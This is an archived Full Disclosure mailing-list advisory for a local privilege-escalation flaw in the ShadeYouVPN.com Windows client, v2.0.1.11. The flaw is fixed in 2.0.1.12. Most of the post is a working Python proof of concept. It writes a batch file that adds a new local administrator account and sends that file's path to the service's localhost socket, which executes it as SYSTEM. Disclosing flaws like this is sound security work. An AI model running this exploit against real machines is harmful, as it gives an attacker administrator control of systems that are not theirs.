[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CACoXDXga08prCi9oZsnnG=2x3JnfgyGaeaVLUh7qJjEFY5e3sw@mail.gmail.com>
Date: Tue, 14 Feb 2017 14:11:27 +0100
From: Kacper Szurek <kacperszurek@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] ShadeYouVPN.com Client v2.0.1.11 for Windows Privilege
Escalation
# Exploit ShadeYouVPN.com Client v2.0.1.11 for Windows Privilege Escalation
# Date: 14.02.2017
# Software Link: https://shadeyouvpn.com/
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: local
1. Description
`ShadeYou` service executes any file path send through socket without
verification as SYSTEM user.
https://security.szurek.pl/shadeyouvpncom-client-v20111-for-windows-privilege-escalation.html
2. Proof of Concept
import socket
import tempfile
print "ShadeYouVPN.com Client v2.0.1.11 for Windows Privilege Escalation"
print "by Kacper Szurek"
print "https://security.szurek.pl/"
print "https://twitter.com/KacperSzurek"
t = tempfile.TemporaryFile(delete=False, suffix='.bat')
t.write("net user shade /add\n")
t.write("net localgroup administrators shade /add")
t.close()
s = socket.socket()
s.connect(("127.0.0.1", 10295))
s.send("s||config|"+t.name+"|ccccc|ddddd|eeee|ffff|\r\n")
print s.recv(1024)
print s.recv(1024)
3. Solution
Update to version 2.0.1.12
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists